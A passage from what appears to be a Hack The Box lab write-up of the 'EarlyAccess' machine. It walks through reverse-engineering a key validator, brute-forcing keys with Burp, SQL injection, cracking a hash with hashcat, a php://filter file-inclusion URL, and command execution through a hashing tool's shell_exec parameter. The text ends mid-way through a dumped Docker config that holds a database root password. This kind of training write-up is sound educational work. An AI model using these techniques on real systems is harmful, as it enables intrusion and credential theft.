                                              if not self.g1_valid():
                                              return False
                                              if not self.g2_valid():
                                              return False
                                              if not self.g3_valid():
                                              return False
                                              if not self.g4_valid():
                                              return False
                                              if not self.cs_valid():
                                              print('[Critical] Checksum verification failed!')
                                              return False
                                              return True
          
                                              if __name__ == "__main__":
                                              if len(sys.argv) != 2:
                                              print(Key.info())
                                              sys.exit(-1)
                                              input = sys.argv[1]
                                              validator = Key(input)
                                              if validator.check():
                                              print(f"Entered key is valid!")
                                              else:
                                              print(f"Entered key is invalid!")
                                      </code>
                                      </pre>
          <p>This is the original code it looks like they validate the key in parts so if we can
          reverse engineer these parts we can find out how to crack the key.</p>
          <a href="img/portfolio/minor/red/htb_linux/PythonCompiler.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PythonCompiler.png" alt=""></a>
          <p>I put the Python code in an online compiler and removed all the functions and made it
          into a script. Then I put all the results in variables so we can see if a try is
          valid.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          from re import match
          
                                          class Key:
                                          key = "KEY01-0H0H0-XPAA0-GAME1-1295" #defaultkey=AAAAA-BBBBB-CCCC1-DDDDD-1234
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
                                          valid = False
                                          cs_value = 0
                                          cs_valid = False
                                          g1_valid = False
                                          g2_valid = False
                                          g3_valid = False
                                          g4_valid = False
          
                                          valid =
                                          bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                          key))
                                          print("valid_format: ", valid)
          
                                          gs = key.split('-')[:-1]
                                          cs_value = sum([sum(bytearray(g.encode())) for g in gs])
                                          print("cs_value: ", cs_value)
          
                                          ### g1 discovered by changing the first 3 characters untill the r value matched
                                          g1 = key.split('-')[0]
                                          r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                          print("r: ", r)
                                          if r != [221, 81, 145]:
                                          g1_valid = False
                                          for v in g1[3:]:
                                          try:
                                          int(v)
                                          except:
                                          g1_valid = False
                                          g1_valid = len(set(g1)) == len(g1)
                                          print("g1_valid: ", g1_valid)
          
                                          ### g2 discovered by putting p1 on 0 and shifting p2 until it matched
                                          g2 = key.split('-')[1]
                                          p1 = g2[::2]
                                          p2 = g2[1::2]
                                          g2_valid = sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
                                          print("g2_valid: ", g2_valid)
          
                                          # TODO: Add mechanism to sync magic_num with API
                                          g3 = key.split('-')[2]
                                          if g3[0:2] == magic_value:
                                          g3_valid = sum(bytearray(g3.encode())) == magic_num
                                          else:
                                          g3_valid = False
                                          print("g3_valid: ", g3_valid)
          
                                          ### Same approach as g1 try different values untill they matched
                                          print("g4: ", [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])])
                                          g4_valid = [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])] == [12,
                                          4, 20, 117, 0]
                                          print("g4_valid: ", g4_valid)
          
                                          ### The CS value is just a byte sum of the whole key so this has to be the last value to
                                          crack and is pretty easy because we can just print the real CS value and match it
                                          cs = int(key.split('-')[-1])
                                          print("cs: ", cs)
                                          cs_valid = cs_value == cs
                                          print("cs_valid: ", cs_valid)
          
                                          def check(self) -> bool:
                                          if not self.valid_format():
                                          print('Key format invalid!')
                                          return False
                                          if not self.g1_valid():
                                          return False
                                          if not self.g2_valid():
                                          return False
                                          if not self.g3_valid():
                                          return False
                                          if not self.g4_valid():
                                          return False
                                          if not self.cs_valid():
                                          print('[Critical] Checksum verification failed!')
                                          return False
                                          return True
                                      </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png" alt=""></a>
          <p>We cracked the code but the only thing that didn't work is part G3 because the magic
           number seems to be different on the server. When we try to validate it locally using the
          original validator script the key is valid. But maybe we can bruteforce this magic
          number using Burpsuite. There are only 60 possible combinations because the magic number
          is a sum of the last 3 characters, because the code said that the first two "XP" are
          static, And each character has a specific value. So I made a list.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          KEY01-0H0H0-XPAA0-GAME1-1295
                                          KEY01-0H0H0-XPAB0-GAME1-1296
                                          KEY01-0H0H0-XPAC0-GAME1-1297
                                          KEY01-0H0H0-XPAD0-GAME1-1298
                                          KEY01-0H0H0-XPAE0-GAME1-1299
                                          KEY01-0H0H0-XPAF0-GAME1-1300
                                          KEY01-0H0H0-XPAG0-GAME1-1301
                                          KEY01-0H0H0-XPAH0-GAME1-1302
                                          KEY01-0H0H0-XPAI0-GAME1-1303
                                          KEY01-0H0H0-XPAJ0-GAME1-1304
                                          KEY01-0H0H0-XPAK0-GAME1-1305
                                          KEY01-0H0H0-XPAL0-GAME1-1306
                                          KEY01-0H0H0-XPAM0-GAME1-1307
                                          KEY01-0H0H0-XPAN0-GAME1-1308
                                          KEY01-0H0H0-XPAO0-GAME1-1309
                                          KEY01-0H0H0-XPAP0-GAME1-1310
                                          KEY01-0H0H0-XPAQ0-GAME1-1311
                                          KEY01-0H0H0-XPAR0-GAME1-1312
                                          KEY01-0H0H0-XPAS0-GAME1-1313
                                          KEY01-0H0H0-XPAT0-GAME1-1314
                                          KEY01-0H0H0-XPAU0-GAME1-1315
                                          KEY01-0H0H0-XPAV0-GAME1-1316
                                          KEY01-0H0H0-XPAW0-GAME1-1317
                                          KEY01-0H0H0-XPAX0-GAME1-1318
                                          KEY01-0H0H0-XPAY0-GAME1-1319
                                          KEY01-0H0H0-XPAZ0-GAME1-1320
                                          KEY01-0H0H0-XPBZ0-GAME1-1321
                                          KEY01-0H0H0-XPCZ0-GAME1-1322
                                          KEY01-0H0H0-XPDZ0-GAME1-1323
                                          KEY01-0H0H0-XPEZ0-GAME1-1324
                                          KEY01-0H0H0-XPFZ0-GAME1-1325
                                          KEY01-0H0H0-XPGZ0-GAME1-1326
                                          KEY01-0H0H0-XPHZ0-GAME1-1327
                                          KEY01-0H0H0-XPIZ0-GAME1-1328
                                          KEY01-0H0H0-XPJZ0-GAME1-1329
                                          KEY01-0H0H0-XPKZ0-GAME1-1330
                                          KEY01-0H0H0-XPLZ0-GAME1-1331
                                          KEY01-0H0H0-XPMZ0-GAME1-1332
                                          KEY01-0H0H0-XPNZ0-GAME1-1333
                                          KEY01-0H0H0-XPOZ0-GAME1-1334
                                          KEY01-0H0H0-XPPZ0-GAME1-1335
                                          KEY01-0H0H0-XPQZ0-GAME1-1336
                                          KEY01-0H0H0-XPRZ0-GAME1-1337
                                          KEY01-0H0H0-XPSZ0-GAME1-1338
                                          KEY01-0H0H0-XPTZ0-GAME1-1339
                                          KEY01-0H0H0-XPUZ0-GAME1-1340
                                          KEY01-0H0H0-XPVZ0-GAME1-1341
                                          KEY01-0H0H0-XPWZ0-GAME1-1342
                                          KEY01-0H0H0-XPXZ0-GAME1-1343
                                          KEY01-0H0H0-XPYZ0-GAME1-1344
                                          KEY01-0H0H0-XPZZ0-GAME1-1345
                                          KEY01-0H0H0-XPZZ1-GAME1-1346
                                          KEY01-0H0H0-XPZZ2-GAME1-1347
                                          KEY01-0H0H0-XPZZ3-GAME1-1348
                                          KEY01-0H0H0-XPZZ4-GAME1-1349
                                          KEY01-0H0H0-XPZZ5-GAME1-1350
                                          KEY01-0H0H0-XPZZ6-GAME1-1351
                                          KEY01-0H0H0-XPZZ7-GAME1-1352
                                          KEY01-0H0H0-XPZZ8-GAME1-1353
                                          KEY01-0H0H0-XPZZ9-GAME1-1354
                                      </code>
                                      </pre>
          <p>First we need to intercept to post so we can copy it.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png" alt=""></a>
          <p>Now we can send it to the intruder to start brute-forcing this magic number.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png" alt=""></a>
          <p>I've added the payload which is the list of possible combinations we've just compiled.
          Now we need to add it into the POST.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png" alt=""></a>
          <p>Now let's start attacking!</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png" alt=""></a>
          <p>That didn't go as planned it looks like all the requests got redirected let's look at the
          settings if we can change anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png" alt=""></a>
          <p>Looks like Burpsuite just needed to be allowed to follow redirects. This is probably also
          the reason why our first GoBuster attempt failed.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png" alt=""></a>
          <p>Now to second attack is way more promising. One key stands out because the response
          length is different from the rest. Let's try that key and see what happens.</p>
          <a href="img/portfolio/minor/red/htb_linux/KeyValidationTest.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/KeyValidationTest.png" alt=""></a>
          <p>And it worked! Now lets go back to our normal user account and add this key to our
          account.</p>
          <a href="img/portfolio/minor/red/htb_linux/AddKeyToUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AddKeyToUser.png" alt=""></a>
          <p>Now we got the key added to our account we can take a look at that game subdomain we
           found earlier.</p>
          <a href="img/portfolio/minor/red/htb_linux/Scoreboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Scoreboard.png" alt=""></a>
          <p>Something I noticed instantly is the scoreboard that the SingleQuoteMan talked about on
          the forum. Maybe we can do the same trick with SQLI as we did with XSS at the beginning.
          We can do a simple SQLI test to find out if it's vulnerable.</p>
          <a href="img/portfolio/minor/red/htb_linux/VulnForSQLI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/VulnForSQLI.png" alt=""></a>
          <p>It is vulnerable but we didn't match the columns hence why it didn't show any output so
          lets try that again.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLVersion.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLVersion.png" alt=""></a>
          <p>Now look at that this should be easy. Lets try to enumerate the database tables.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIDBDump.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIDBDump.png" alt=""></a>
          <p>A user table? Very interesting lets see if it contains any passwords or usernames.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIUsers.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIUsers.png" alt=""></a>
          <p>And it does! Looks like we got an admin username and a password hash we need to crack.
          But first lets find out what type of hash it is.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashIdentifier.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashIdentifier.png" alt=""></a>
          <p>Looks like it's a SHA1 hash lets see if Hashcat can find the password for us.</p>
          <code>hashcat -a 0 -m 100 adminhash.txt /usr/share/wordlists/rockyou.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/Hashcat.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Hashcat.png" alt=""></a>
          <p>Yes it can! Now lets try to use these credentials to log into the dev subdomain.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png" alt=""></a>
          <p>Lets try to run Dirbuster one more time to see if it finds anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/Dirbuster.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Dirbuster.png" alt=""></a>
          <p>Almost forgot we have to add the PHPSESSID from this admin to Dirbuster otherwise it
          won't have access to enumerate the site.</p>
          <a href="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png" alt=""></a>
          <p>Dirtbuster found a file called /actions/file.php which could be interesting. By the looks
          of it this is the file that is running on the homepage of this subdomain as well but
          there it said it didn't have a GUI yet. Maybe we can use it without GUI now we know the
          location of the file. But we need to know the command because now it gives us an
          error.</p>
          <a href="img/portfolio/minor/red/htb_linux/SpecifyFile.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SpecifyFile.png" alt=""></a>
          <p>Lets try some common command in this context like file, path and filepath. Hey! Filepath
          worked and now we can execute files and apparently also the hashingTool that is also on
          the homepage.</p>
          <a href="img/portfolio/minor/red/htb_linux/FileExecuted.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FileExecuted.png" alt=""></a>
          <p>Lets take a look at LFI (Local File Inclusion) and see if we can do something with that.
          I've found this <a href="https://medium.com/@nyomanpradipta120/local-file-inclusion-vulnerability-cfd9e62d12cb">website</a>
          that explains a LFI vulnerability we could try</p>
          <code>https://dev.earlyaccess.htb/actions/file.php?filepath=php://filter/convert.base64-encode/resource=/var/www/earlyaccess.htb/dev/actions/hash.php</code>
          <a href="img/portfolio/minor/red/htb_linux/HashBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashBase64.png" alt=""></a>
          <p>This gave us the base64 of the hash.php file if we can convert it back to code we might
          be able to find a vulnerability.</p>
          <a href="img/portfolio/minor/red/htb_linux/DecodedBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DecodedBase64.png" alt=""></a>
          <p>Using an online base64 decoder we managed to find the source code of the hash.php
          file.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              &#x3C;?php
                                              include_once "../includes/session.php";
          
                                              function hash_pw($hash_function, $password)
                                              {
                                                  // DEVELOPER-NOTE: There has gotta be an easier way...
                                                  ob_start();
                                                  // Use inputted hash_function to hash password
                                                  $hash = @$hash_function($password);
                                                  ob_end_clean();
                                                  return $hash;
                                              }
          
                                              try
                                              {
                                                  if(isset($_REQUEST['action']))
                                                  {
                                                      if($_REQUEST['action'] === "verify")
                                                      {
                                                          // VERIFIES $password AGAINST $hash
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['hash']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
          
                                                              $_SESSION['verify'] = ($hash === $_REQUEST['hash']);
                                                              header('Location: /home.php?tool=hashing');
                                                              return;
                                                          }
                                                      }
                                                      elseif($_REQUEST['action'] === "verify_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE VERIFICATION
                                                      }
                                                      elseif($_REQUEST['action'] === "hash_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE-HASHING
                                                      }
                                                      elseif($_REQUEST['action'] === "hash")
                                                      {
                                                          // HASHES $password USING $hash_function
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
                                                              if(!isset($_REQUEST['redirect']))
                                                              {
                                                                  echo "Result for Hash-function (" . $_REQUEST['hash_function'] . ") and password (" . $_REQUEST['password'] . "):&#x3C;br>";
                                                                  echo '&#x3C;br>' . $hash;
                                                                  return;
                                                              }
                                                              else
                                                              {
                                                                  $_SESSION['hash'] = $hash;
                                                                  header('Location: /home.php?tool=hashing');
                                                                  return;
                                                              }
                                                          }
                                                      }
                                                  }
                                                  // Action not set, ignore
                                                  throw new Exception("");
                                              }
                                              catch(Exception $ex)
                                              {
                                                  if($ex->getMessage() !== "")
                                                      $_SESSION['error'] = htmlentities($ex->getMessage());
          
                                                  header('Location: /home.php');
                                                  return;
                                              }
                                              ?>
                                          </code>
                                      </pre>
          <p>After analyzing the source code it looks like if you send the debug parameter as true and
          the hashing_function as shell_exec, you
          can run any shell command you want from the hashing tool. So lets try that.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png" alt=""></a>
          <p>Looks like it worked now lets try to get a reverse shell.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WWW-DataShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-DataShell.png" alt=""></a>
          <p>And we're in! I looked in the /etc/passwd and noticed another user named www-adm which
          looked like the next user I needed. After looking around for a bit and I couldn't find
          anything I thought what if they reused passwords?</p>
          <a href="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png" alt=""></a>
          <p>And they did so now we have www-adm shell. After looking around I noticed a .wgetrc file
          with some credentials in it. Because it looked like docker was running on the machine I
          thought http://api:5000/ was my best bet.</p>
          <a href="img/portfolio/minor/red/htb_linux/WGETAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETAPI.png" alt=""></a>
          <p>And it was! Apparently there is a check_db endpoint but it required credentials. So I
          tried to credentials we've just found.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatCheckDB.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatCheckDB.png" alt=""></a>
          <p>Looks like JSON but we first need to prettify it to make it more readable.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              {
             "message":{
                "AppArmorProfile":"docker-default",
                "Args":[
                   "--character-set-server=utf8mb4",
                   "--collation-server=utf8mb4_bin",
                   "--skip-character-set-client-handshake",
                   "--max_allowed_packet=50MB",
                   "--general_log=0",
                   "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                ],
                "Config":{
                   "AttachStderr":false,
                   "AttachStdin":false,
                   "AttachStdout":false,
                   "Cmd":[
                      "--character-set-server=utf8mb4",
                      "--collation-server=utf8mb4_bin",
                      "--skip-character-set-client-handshake",
                      "--max_allowed_packet=50MB",
                      "--general_log=0",
                      "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                   ],
                   "Domainname":"",
                   "Entrypoint":[
                      "docker-entrypoint.sh"
                   ],
                   "Env":[
                      "MYSQL_DATABASE=db",
                      "MYSQL_USER=drew",
                      "MYSQL_PASSWORD=drew",
                      "MYSQL_ROOT_PASSWORD=XeoNu86JTznxMCQuGHrGutF3Csq5",
                      "SERVICE_TAGS=dev",
                      "SERVICE_NAME=mysql",
                      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
                      "GOSU_VERSION=1.12",
                      "MYSQL_MAJOR=8.0",
                      "MYSQL_VERSION=8.0.25-1debian10"
                   ],
                   "ExposedPorts":{
                      "3306/tcp":{
          
                      },
                      "33060/tcp":{
          
                      }
                   },
                   "Healthcheck":{
                      "Interval":5000000000,
                      "Retries":3,
                      "Test":[
                         "CMD-SHELL",
                         "mysqladmin ping -h 127.0.0.1 --user=$MYSQL_USER -p$MYSQL_PASSWORD --silent"
                      ],
                      "Timeout":2000000000
                   },
                   "Hostname":"mysql",
                   "Image":"mysql:latest",
                   "Labels":{
                      "com.docker.compose.config-hash":"947cb358bc0bb20b87239b0dffe00fd463bd7e10355f6aac2ef1044d8a29e839",
                      "com.docker.compose.container-number":"1",
                      "com.docker.compose.oneoff":"False",
                      "com.docker.compose.project":"app",
                      "com.docker.compose.project.config_files":"docker-compose.yml",
                      "com.docker.compose.project.working_dir":"/root/app",
                      "com.docker.compose.service":"mysql",
                      "com.docker.compose.version":"1.29.1"
                   },
                   "OnBuild":null,
                   "OpenStdin":false,
                   "StdinOnce":false,
                   "Tty":true,
                   "User":"",
                   "Volumes":{
                      "/docker-entrypoint-initdb.d":{
          
                      },
                      "/var/lib/mysql":{
          
                      }
                   },
                   "WorkingDir":""
                },
                "Created":"2021-10-04T06:57:43.698655618Z",
                "Driver":"overlay2",
                "ExecIDs":null,
                "GraphDriver":{
                   "Data":{
                      "LowerDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d-init/diff:/var/lib/docker/overlay2/ecc064365b0367fc58ac796d9d5fe020d9453c68e2563f8f6d4682e38231083e/diff:/var/lib/docker/overlay2/4a21c5c296d0e6d06a3e44e3fa4817ab6f6f8c3612da6ba902dc28ffd749ec4d/diff:/var/lib/docker/overlay2/f0cdcc7bddc58609f75a98300c16282d8151ce18bd89c36be218c52468b3a643/diff:/var/lib/docker/overlay2/01e8af3c602aa396e4cb5af2ed211a6a3145337fa19b123f23e36b006d565fd0/diff:/var/lib/docker/overlay2/55b88ae64530676260fe91d4d3e6b0d763165505d3135a3495677cb10de74a66/diff:/var/lib/docker/overlay2/4064491ac251bcc0b677b0f76de7d5ecf0c17c7d64d7a18debe8b5a99e73e127/diff:/var/lib/docker/overlay2/a60c199d618b0f2001f106393236ba394d683a96003a4e35f58f8a7642dbad4f/diff:/var/lib/docker/overlay2/29b638dc55a69c49df41c3f2ec0f90cc584fac031378ae455ed1458a488ec48d/diff:/var/lib/docker/overlay2/ee59a9d7b93adc69453965d291e66c7d2b3e6402b2aef6e77d367da181b8912f/diff:/var/lib/docker/overlay2/4b5204c09ec7b0cbf22d409408529d79a6d6a472b3c4d40261aa8990ff7a2ea8/diff:/var/lib/docker/overlay2/8178a3527c2a805b3c2fe70e179797282bb426f3e73e8f4134bc2fa2f2c7aa22/diff:/var/lib/docker/overlay2/76b10989e43e43406fc4306e789802258e36323f7c2414e5e1242b6eab4bd3eb/diff",
                      "MergedDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/merged",
                      "UpperDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/diff",
                      "WorkDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/work"
                   },
                   "Name":"overlay2"
                },
                "HostConfig":{
                   "AutoRemove":false,
                   "Binds":[
                      "/root/app/scripts/init.d:/docker-entrypoint-initdb.d:ro",
                      "app_vol_mysql:/var/lib/mysql:rw"
                   ],
                   "BlkioDeviceReadBps":null,
                   "BlkioDeviceReadIOps":null,
                   "BlkioDeviceWriteBps":null,
                   "BlkioDeviceWriteIOps":null,
                   "BlkioWeight":0,
                   "BlkioWeightDevice":null,
                   "CapAdd":[
                      "SYS_NICE"
                   ],
                   "CapDrop":null,
                   "Cgroup":"",
                   "CgroupParent":"",
                   "CgroupnsMode":"host",
                   "ConsoleSize":[
                      0,
                      0
                   ],
                   "ContainerIDFile":"",
                   "CpuCount":0,
                   "CpuPercent":0,
                   "CpuPeriod":0,
                   "CpuQuota":0,
                   "CpuRealtimePeriod":0,
                   "CpuRealtimeRuntime":0,
                   "CpuShares":0,
                   "CpusetCpus":"",
                   "CpusetMems":"",
                   "DeviceCgroupRules":null,
                   "DeviceRequests":null,
                   "Devices":null,
                   "Dns":null,
                   "DnsOptions":null,
                   "DnsSearch":null,
                   "ExtraHosts":null,
                   "GroupAdd":null,
                   "IOMaximumBandwidth":0,
                   "IOMaximumIOps":0,
                   "IpcMode":"private",
                   "Isolation":"",
                   "KernelMemory":0,
                   "KernelMemoryTCP":0,
                   "Links":null,
                   "LogConfig":{
                      "Config":{
          
                      },
                      "Type":"json-file"
                   },
                   "MaskedPaths":[
                      "/proc/asound",
                      "/proc/acpi",
                      "/proc/kcore",
                      "/proc/keys",
                      "/proc/latency_stats",
                      "/proc/timer_list",
                      "/proc/timer_stats",
                      "/proc/sched_debug",
                      "/proc/scsi",
                      "/sys/firmware"
                   ],
                   "Memory":0,
                   "MemoryReservation":0,
                   "MemorySwap":0,
                   "MemorySwappiness":null,
                   "NanoCpus":0,
                   "NetworkMode":"app_nw",
                   "OomKillDisable":false,
                   "OomScoreAdj":0,
                   "PidMode":"",
                   "PidsLimit":null,
                   "PortBindings":{
          
                   },
                   "Privileged":false,
                   "PublishAllPorts":false,
                   "ReadonlyPaths":[
                      "/proc/bus",
                      "/proc/fs",
                      "/proc/irq",
                      "/proc/sys",
                      "/proc/sysrq-trigger"
                   ],
                   "ReadonlyRootfs":false,
                   "RestartPolicy":{
                      "MaximumRetryCount":0,
                      "Name":"always"
                   },
                   "Runtime":"runc",
                   "SecurityOpt":null,
                   "ShmSize":67108864,
                   "UTSMode":"",
                   "Ulimits":null,
                   "UsernsMode":"",
                   "VolumeDriver":"",
                   "VolumesFrom":[
          
                   ]
                },
                "HostnamePath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hostname",
                "HostsPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hosts",
                "Id":"47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216",
                "Image":"sha256:5c62e459e087e3bd3d963092b58e50ae2af881076b43c29e38e2b5db253e0287",
                "LogPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216-json.log",
                "MountLabel":"",
                "Mounts":[
                   {
                      "Destination":"/docker-entrypoint-initdb.d",
                      "Mode":"ro",
                      "Propagation":"rprivate",
                      "RW":false,
                      "Source":"/root/app/scripts/init.d",
                      "Type":"bind"
                   },
                   {
                      "Destination":"/var/lib/mysql",
                      "Driver":"local",
                      "Mode":"rw",
                      "Name":"app_vol_mysql",
                      "Propagation":"",
                      "RW":true,
                      "Source":"/var/lib/docker/volumes/app_vol_mysql/_data",
                      "Type":"volume"
                   }
                ],
                "Name":"/mysql",
                "NetworkSettings":{
                   "Bridge":"",
                   "EndpointID":"",
                   "Gateway":"",
                   "GlobalIPv6Address":"",
                   "GlobalIPv6PrefixLen":0,
                   "HairpinMode":false,
                   "IPAddress":"",
                   "IPPrefixLen":0,
                   "IPv6Gateway":"",
                   "LinkLocalIPv6Address":"",
                   "LinkLocalIPv6PrefixLen":0,
                   "MacAddress":"",
                   "Networks":{
                      "app_nw":{
                         "Aliases":[
                            "47c78eb0450f",
                            "mysql"
                         ],
                         "DriverOpts":null,
                         "EndpointID":"50037fb137fd880f88a9efd17eb8cf94bf8142ec263080b4c904afeeaa79aa2e",
                         "Gateway":"172.18.0.1",
                         "GlobalIPv6Address":"",
                         "GlobalIPv6PrefixLen":0,
                         "IPAMConfig":{
                            "IPv4Address":"172.18.0.100"
                         },
                         "IPAddress":"172.18.0.100",
                         "IPPrefixLen":16,
                         "IPv6Gateway":"",
                         "Links":null,
                         "MacAddress":"02:42:ac:12:00:64",
                         "NetworkID":"021b24b8b3e1e3638463eeb7dc9af59c36cc412578cdf51931a24f04ea6f5532"
                      }
                   },
                   "Ports":{
                      "3306/tcp":null,
                      "33060/tcp":null
                   },
                   "SandboxID":"99cbb57fded2142e5dad46330b43249d2866f8514fb4342d06322f3e3b5c60f1",
                   "SandboxKey":"/var/run/docker/netns/99cbb57fded2",
                   "SecondaryIPAddresses":null,
                   "SecondaryIPv6Addresses":null
                },
                "Path":"docker-entrypoint.sh",
                "Platform":"linux",
                "ProcessLabel":"",
                "ResolvConfPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/resolv.conf",
                "RestartCount":0,
                "State":{
                   "Dead":false,
                   "Error":"",
                   "ExitCode":0,
                   "FinishedAt":"0001-01-01T00:00:00Z",
                   "Health":{
                      "FailingStreak":0,
                      "Log":[
                         {
                            "End":"2021-10-04T17:08:01.998027574+02:00",
                            "ExitCode":0,
